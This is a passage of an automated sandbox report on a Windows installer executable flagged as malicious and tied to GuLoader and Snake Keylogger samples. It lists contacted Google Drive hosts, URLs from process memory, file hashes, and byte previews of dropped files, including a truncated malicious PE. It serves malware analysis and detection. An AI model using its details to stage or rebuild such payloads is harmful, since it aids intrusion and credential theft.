http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | false | high
https://drive.google.com/s | msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp | false | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate | svchost.exe, 00000003.00000002.2415877697.0000017F82EAF000.00000004.00000020.00020000.00000000.sdmp | false | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.ver) | svchost.exe, 00000003.00000002.2416637984.0000017F88200000.00000004.00000020.00020000.00000000.sdmp | false | high
https://drive.usercontent.google.com/ | msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.3.dr | false | high
http://nsis.sf.net/NSIS_ErrorError | GyGE2VaBFL.exe, GyGE2VaBFL.exe.1.dr | false | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/Prod.C: | edb.log.3.dr | false | high
https://www.google.com | msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.3.dr | false | high
http://nsis.sf.net/NSIS_Error | GyGE2VaBFL.exe, GyGE2VaBFL.exe.1.dr | false | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | false | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmp | false | high
https://drive.google.com/ | msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmp | false | high
https://drive.usercontent.google.com/do0 | msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmp | false | high
https://drive.google.com/U | msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp | false | high
https://apis.google.com | msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmp | false | high
https://drive.google.com/f | msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp | false | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | high
Legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.185.193 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
216.58.206.78 | drive.google.com | United States | | 15169 | GOOGLEUS | false

IP
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632354
Start date and time: 2025-03-07 22:44:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GyGE2VaBFL.exe (renamed because original name is a hash value)
Original Sample Name: 0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/27@2/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 84
• Number of non-executed functions: 40
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.60.203.209
• Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Time | Type | Description
16:45:46 | API Interceptor | 41x Sleep call for process: powershell.exe modified
16:45:47 | API Interceptor | 2x Sleep call for process: svchost.exe modified
16:46:45 | API Interceptor | 10x Sleep call for process: msiexec.exe modified
No context
No context
No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | 1258ad6Jpw.exe | Get hash | malicious | GuLoader | Browse | 216.58.206.78, 142.250.185.193
 | ZUY4Nq2SyY.exe | Get hash | malicious | GuLoader | Browse | 216.58.206.78, 142.250.185.193
 | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 216.58.206.78, 142.250.185.193
 | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 216.58.206.78, 142.250.185.193
 | sR4s2qQF6I.exe | Get hash | malicious | GuLoader | Browse | 216.58.206.78, 142.250.185.193
 | VnaQJI0ScP.exe | Get hash | malicious | GuLoader | Browse | 216.58.206.78, 142.250.185.193
 | bvhauD4o49.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 216.58.206.78, 142.250.185.193
 | 26YzPy68Rz.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 216.58.206.78, 142.250.185.193
 | CWu89IbJQw.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 216.58.206.78, 142.250.185.193
 | R513Lbg4Qu.exe | Get hash | malicious | GuLoader | Browse | 216.58.206.78, 142.250.185.193

No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3073662174470488
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In
MD5: 6C26B1A84A15EA72D024C3CA321F0F43
SHA1: AE352680D26D98E431FA281D62E60C51E5309F29
SHA-256: F492F5F47DDC2E4DC249F212831CF7CE176AA00199B15B0DBECB0CB9AA655762
SHA-512: BB7E553BA766A2A11BC133083A53CB24F89670D4DD1147A034CAA81843A9F95413B8AA3DAD294312049FB7D593C7D960C3B70E2AF1DD405C29B2387ED33B010B
Malicious: false
Reputation: low
Preview: z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xaa332701, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.4221517097470329
Encrypted: false
SSDEEP: 1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
MD5: 9F0210455A788C5EC4399730917CA80D
SHA1: EFE5B8798EC6C6A9124B29AFECEFB0843961E233
SHA-256: 8D27833F9420FCB87CE1B61A6913D796594CD5AE1379152B796D344654F81AE8
SHA-512: 4DE09870AADA85F7807A2922BDAE5FCD82F050E9E87D48308F5C2DDDF9D0E865457E39C8963785257EF69A2A1E3568733EAA2D2956D33247557C4746338C5D76
Malicious: false
Reputation: low
Preview: .3'.... .......A.......X\...;...{......................0.!..........{A./-...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................x../-...}...................+./-...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07722811369453877
Encrypted: false
SSDEEP: 3:blXKYe9NVmYGjjn13a/H9tAllcVO/lnlZMxZNQl:b1Kz9NEYGj53q/AOewk
MD5: 5050EAF3EC42DD5B8F9A7DCC5538CE57
SHA1: 3B61F0163A4CB3B4EF4A92C56F33B22B5E88CE54
SHA-256: 123BDD6EF26C97E41C5DD2FEAEE403A03B0389D15CC30F6447819B594A9ACE7C
SHA-512: C9832F7273D7C41C777488086EBFC73E985663298699A63BADE7C70F4E2AA1B47D7B1300D22CB66289A3F7CCADA0AE45E311203B31098A173FDFAE4281430F90
Malicious: false
Reputation: low
Preview: .X.......................................;...{../-...}.......{A..............{A......{A..........{A]..................+./-...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):53158
                                                                        Entropy (8bit):5.062687652912555
                                                                        Encrypted:false
                                                                        SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                        MD5:5D430F1344CE89737902AEC47C61C930
                                                                        SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                        SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                        SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Category:dropped
                                                                        Size (bytes):791053
                                                                        Entropy (8bit):7.596359760786588
                                                                        Encrypted:false
                                                                        SSDEEP:12288:2tlyuHaQfKR13fxFozNXofFxNc3pipkyfGSw:AbQRdpAiF3c5yfFw
                                                                        MD5:D8EACF83CA07943696BF5E23528CC348
                                                                        SHA1:1AA708342F955F268F43CBD7705DC1497CF91D46
                                                                        SHA-256:0A494235E29B9A51BA2120377CBC09AE119C0E6EDA64072218343E69C85D1783
                                                                        SHA-512:72D24F737152A33FB7B9BB38B4DC9886711F8A1CD4089021AA08482DB193221359CAC6836F63362994E988F02788E00DCB0A836C0387DF19F04BB557561F8FEC
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 64%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@...........................=...........@.................................8........0;.h............................................................................................................text...0b.......d.................. ..`.rdata..t............h..............@..@.data...x.9..........|..............@....ndata.......@:..........................rsrc...h....0;.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):216186
                                                                        Entropy (8bit):1.2440696313854045
                                                                        Encrypted:false
                                                                        SSDEEP:3072:JWmCwIPw5AcywvTvHnxuoEWljFo26U82/LdKhBMqn3xh0:7BIM8I
                                                                        MD5:A294462A1566CE13B91DCE3515CBBE99
                                                                        SHA1:2EE7CA771D5EE98F23DFD60AEF636063FB9FB39E
                                                                        SHA-256:159A445C0FE5840209F47C0846AAC408D7A52CB16BF69E8ED9EF461CF9618063
                                                                        SHA-512:E08266B0CAF0E0089EFCA6FF49924E65073B89F26B60F84642F744E4C24BD8F0F61F892BC5DA8C36A276CA40090DF427DCA581B43AEDB841F2188983F2CBDE21
                                                                        Malicious:false
                                                                        Preview:........................9...........w............~.................................[...............Z........................../......C..........................................).......................................#..........................................................b.......................................................0..............................................L...................................2........................8..............%......w........................F.............................................................................................................G.................................................................E.........................v.............................................q......................V........l...........................................................................................................`...............i..l.....".......,..............F...................................U...........m......................X.....
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):52515
                                                                        Entropy (8bit):1.2339950087992486
                                                                        Encrypted:false
                                                                        SSDEEP:384:TZuT1tvvcUHAApb0CSLYXN2ESvROeZ+tAKgXBmf6rF0OxFpsDcfTcG+nOMT60EI/:ItMfIDSvRBZ+tbgXBDF0Ovx+fT64oNy
                                                                        MD5:7FB552F9EDF2578492ECB1AC6ED812D4
                                                                        SHA1:D976EC08EE4E7F05B8A370B904332F56471D27DE
                                                                        SHA-256:6356F2D4505DB44E6E8159A1D677250F09B796DDDB00182951E16D04E7A53F63
                                                                        SHA-512:342ECEFD649D96C9A06DC283DB808A4320A2803DCD461FE509E5D564ABB612EF4B65A9450511189B29E49D5A4087A3F27A9D5C15EEEC2D2EB55C49D486F48F54
                                                                        Malicious:false
                                                                        Preview:.........................................................................................................................a........'.B................................................................................`...................S.........................................................................................3....................................P...............................q..........................9..........R...'...................p...................................................................................................................>..............4..............................l..".......................................................o....................T....................;...........+..................................v.....6................................b../......g.......x..............................S.........g7#................b.....................................................?................................................................
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):6406
                                                                        Entropy (8bit):7.91324021094192
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctcs:7XzuOmvyfhEE25XvJs
                                                                        MD5:69FDCA2AECDDEC1F02F8849BB7524031
                                                                        SHA1:897688E80B403AAC39036851ABDF8D07F948CFED
                                                                        SHA-256:7AFD32B592315D4D5DACC9205EDB18F058CC312B95C690AEC795AE1C5CDBCFD9
                                                                        SHA-512:0AEE6236EC213A1F829F64A94F277C334467CCA974664104129BD3B52E8FDCC049741B73E5B5E9453A1B8D7E5A828C5DB8A5BBECB4A3FF5470B42C082469172B
                                                                        Malicious:false
